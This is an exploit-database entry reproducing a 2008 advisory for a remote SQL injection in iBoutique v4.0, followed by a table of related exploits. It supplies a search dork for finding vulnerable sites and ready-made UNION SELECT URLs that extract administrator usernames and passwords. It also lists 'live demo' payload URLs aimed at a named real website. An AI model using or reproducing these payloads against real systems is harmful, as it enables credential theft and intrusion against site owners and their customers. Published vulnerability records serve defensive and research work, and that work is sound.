################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# # --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond # # and all darkc0de members ---# ################################################################ # # Author: r45c4l and h4x0r # # Home : www.darkc0de.com # # Email : r45c4l@hotmail.com, vaibhavaher@gmail.com # # Share the c0de! # ################################################################ # # Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability # # App Name: iBoutique v4.0 # # App Home: http://www.netartmedia.net/iboutique/ # # App Demo: http://www.netartmedia.net/iboutique/demo.html # ################################################################# # Dork: Powered by iBoutique v4.0 # # # POC: # For username : # # http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- # # For password : # # http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- # # # # Live Demo: # http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- # # http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- # # # # # # ################################################################ # Vuln Discovered 12th Sep 2008 # milw0rm.com [2008-09-12]
Related Exploits
Trying to match CVEs (1): CVE-2008-4354Trying to match OSVDBs (1): 48127
Other Possible E-DB Search Terms: iBoutique 4.0, iBoutique
Date | D | V | Title | Author |
---|---|---|---|---|
2010-06-20 |
![]() |
iBoutique - 'page' SQL Injection / Cross-Site Scripting | L0rd CrusAd3r | |
2012-07-20 |
![]() |
iBoutique 4.0 - 'key' SQL Injection | SecPod Rese... | |
2012-06-19 |
![]() |
iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities | Vulnerabili... | |
2009-09-15 |
![]() |
iBoutique.MALL 1.2 - 'cat' Blind SQL Injection | InjEctOr5 | |
2010-06-28 |
![]() |
Netartmedia iBoutique.MALL - SQL Injection | Sid3^effects |